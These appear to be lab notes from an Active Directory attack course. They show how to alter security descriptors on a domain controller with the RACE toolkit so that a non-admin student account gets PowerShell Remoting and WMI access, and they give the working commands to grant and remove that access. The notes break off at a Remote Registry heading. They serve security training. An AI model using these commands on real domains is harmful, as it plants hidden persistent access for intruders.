It is possible to modify SD like Owner, primary group, DACL, SACL of multiple remote access methods (securable objects) to allow access to non-admin users.
Admin privileges are required to modify SD.
ACLs can be modified to allow non-admin users access securable objects.
PowerShell Remoting:
Use RACE toolkit, either PSRemoting or WMI
Using PSRemoting
# Using PSRemoting# Run InviShell# First of all run (to import RACE Toolikit) -:. C:\AD\Tools\RACE-master\RACE.ps1# On local machine for student1, open elevated cmd:# This reads the existing ACL for root namespace and DCOM and add an entry for our SID.Set-RemotePSRemoting-SamAccountName student1 -Verbose# On remote machine for student1 without credentials:Set-RemotePSRemoting-SamAccountName student1 -ComputerName dcorp-dc -Verbose# Connect to dcorp-dc as studentEnter-PSSession-ComputerName dcorp-dc# To remove the permissions on remote machine:Set-RemotePSRemoting-SamAccountName student1 -ComputerName dcorp-dc -Remove
Using WMI
# OR Using WMI Set-RemoteWMI-SamAccountName student1 -Verbose# On remote machine for student1 without credentials:Set-RemoteWMI-SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2'-Verbose# On remote machine with explicit credentials. Only root\cimv2 and nested namespaces:Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose
# On remote machine remove permissions:Set-RemoteWMI-SamAccountName student1 -ComputerName dcorp-dc-namespace 'root\cimv2'-Remove -Verbose# Now we can run WMI queries on DC as student. powershellgwmi -class win32_operatingsystem -ComputerName dcorp-dc
Remote Registry:
Using RACE or DAMP, with admin privs on remote machine (Make sure to run this first) -: